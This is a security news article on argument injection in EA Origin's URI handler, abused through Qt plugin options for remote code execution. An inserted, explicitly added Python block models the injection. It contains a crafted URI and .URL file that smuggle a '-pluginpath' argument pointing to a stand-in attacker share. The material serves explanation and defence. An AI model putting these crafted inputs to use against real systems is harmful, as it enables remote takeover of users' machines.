Qt framework exploited to take full control of Windows devices

EA’s Origin gaming client can be exploited to allow an attacker to take complete control of Windows devices.

In a technical blog post published earlier this week, independent security researcher @zer0pwn demonstrated how argument injection through Origin’s custom URI scheme handler, combined with command-line options exposed by Qt – the open source GUI toolkit behind Origin – could be leveraged to force the gaming client to load a backdoored plugin.

The technique employed by the 21-year-old is partly based on previous research, and once again highlights the dangers of poorly implemented custom URI schemes.

“ZDI wrote about this technique at the beginning of April, and listed a couple of CVEs to go along with it,” the researcher told The Daily Swig.

“The issue presents itself when the Qt application registers a custom URI handler and doesn’t have any checks for special characters/argument injection.”

In developing his proof of concept, zer0pwn used a Windows 8 box running Internet Explorer 11.

Here, a specially crafted URI is launched via an iframe, so victims need only be fooled into following a malicious link for an attacker to gain remote code execution (RCE) and take full control of their device.

Shortcuts to success

Modern browsers percent-encode special characters in a URI before handing it to a custom scheme handler, which defeats this kind of argument injection, and so the main takeaway here (as ever) would be for Windows users to avoid the aging IE browser.

Delving deeper into the vulnerability, however, zer0pwn demonstrated how the technique can also be used to compromise machines running other browsers – although this would entail some social engineering.

“Exploiting this issue on an updated Windows 10 [machine] would be trivial,” he explains. “The underlying issue remains; however, the delivery of the payload is where things get complicated.

“Modern browsers encode special characters when a link is clicked, which defeats the argument injection. You can use .URL files to use special characters in a specially crafted URI, however this would require a user to actually open a .URL file from the internet.

He added: “Most browsers don’t consider .URL files dangerous. For example, Edge will smart-scan it, the file will pass the scan, and the process will then be launched with the injected arguments.

“If you were to convince someone to open a specially crafted .URL file, you could leverage code execution and infect someone via the custom URI scheme Origin has implemented.”
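The mechanics described above, as an added example that is not code from the original article or from the researcher: a model of how Windows turns a custom-scheme URI into the handler’s argv, why an unencoded quote or space in the URI becomes extra command-line arguments, why a browser’s percent-encoding stops that, and why a .URL file does not. The handler path, the template with "%1", and the injected flag `-pluginpath` are placeholders; the article does not name the Qt option used, and no real registry value is reproduced here.

```python
"""Model of argument injection through a Windows URI scheme handler.

Added example, not from the article or from zer0pwn. Handler path, template and
the '-pluginpath' flag are assumptions standing in for unnamed real values.
"""
from urllib.parse import quote

# Assumed shape of a scheme registration (HKCR\<scheme>\shell\open\command):
# the shell substitutes the full URI for %1 textually, with no escaping.
HANDLER_TEMPLATE = r'"C:\Origin\Origin.exe" "%1"'   # placeholder path


def split_windows_command_line(cmdline: str) -> list[str]:
    """Simplified CommandLineToArgvW / MSVCRT rules: whitespace separates
    arguments outside quotes, '"' toggles quoting, 2n backslashes before a
    quote give n backslashes (2n+1 give n backslashes plus a literal quote),
    and backslashes elsewhere are literal."""
    argv, cur, in_quotes, have_arg, i = [], [], False, False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < len(cmdline) and cmdline[j] == "\\":
                j += 1
            n = j - i
            if j < len(cmdline) and cmdline[j] == '"':
                cur.append("\\" * (n // 2))
                if n % 2 == 1:
                    cur.append('"')            # escaped literal quote
                else:
                    in_quotes = not in_quotes  # the quote is a delimiter
                have_arg, i = True, j + 1
            else:
                cur.append("\\" * n)
                have_arg, i = True, j
            continue
        if c == '"':
            in_quotes, have_arg = not in_quotes, True
        elif c in " \t" and not in_quotes:
            if have_arg:
                argv.append("".join(cur))
            cur, have_arg = [], False
        else:
            cur.append(c)
            have_arg = True
        i += 1
    if have_arg:
        argv.append("".join(cur))
    return argv


def argv_for_uri(uri: str) -> list[str]:
    """argv the handler process receives after textual %1 substitution."""
    return split_windows_command_line(HANDLER_TEMPLATE.replace("%1", uri))


def browser_encode(uri: str) -> str:
    """Approximation of what a modern browser does to a clicked link before
    handing it to the OS: percent-encode space, '"', '\\' and the like."""
    return quote(uri, safe=":/?=&")


def url_from_dot_url_file(text: str) -> str:
    """Extract URL= from an Internet Shortcut (.URL) file. Opening the file
    passes this value to the scheme handler with no browser encoding step."""
    for line in text.splitlines():
        if line.strip().lower().startswith("url="):
            return line.strip()[4:]
    raise ValueError("no URL= line in .URL file")


def uri_is_injection_safe(uri: str) -> bool:
    """Check a handler should make before the URI reaches a command line:
    reject quotes, whitespace and control characters (or encode them)."""
    return not any(c == '"' or c.isspace() or ord(c) < 0x20 for c in uri)


# Constructed attacker URI: the quote closes the "%1" string early and the
# remainder becomes additional arguments for the Qt application.
CRAFTED_URI = r'origin://game/launch?x=" -pluginpath "\\attacker\share'

# Constructed .URL file carrying the same URI unencoded.
CRAFTED_DOT_URL = "[InternetShortcut]\r\nURL=" + CRAFTED_URI + "\r\n"

if __name__ == "__main__":
    print("old browser, no encoding :", argv_for_uri(CRAFTED_URI))
    print("modern browser, encoded  :", argv_for_uri(browser_encode(CRAFTED_URI)))
    print("opened from .URL file    :", argv_for_uri(url_from_dot_url_file(CRAFTED_DOT_URL)))
    print("handler check rejects it :", not uri_is_injection_safe(CRAFTED_URI))
```

Run stand-alone, the unencoded and .URL paths yield four arguments (the injected flag and a UNC path arrive as separate argv entries), while the browser-encoded link yields a single opaque URI argument, which is the distinction the researcher draws between IE 11 and current browsers.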

Take two

Zer0pwn used Origin as his “crash test dummy” for this exploit, but the researcher said the flaw is likely to impact other apps making use of the Qt GUI framework.

“Because the Qt framework allows command-line options to preload (remote) plugins, this technique can be applied to any application that was built using Qt,” he said.

“Microsoft may want to address [the way it handles .URL files], as it could be used to leverage argument injection in any application, not just Origin.”

According to the researcher, EA is currently working on a fix, although at the time of writing Origin users are still vulnerable.

“This issue was originally reported a month ago,” said zer0pwn. “I requested an update on the issue with no response, however merely hours after publishing the vulnerability they replied and assured me they were working on a fix.”

News of the RCE loophole comes a month after security researchers provided details of another, unrelated bug in the Origin desktop client that left millions of Windows PC gamers vulnerable to being hacked.

This earlier flaw was patched before the researchers went public with their findings. However, apparently frustrated with EA’s tardy response, zer0pwn has released a bypass for this first exploit, as well.

The Daily Swig has reached out to EA for comment.
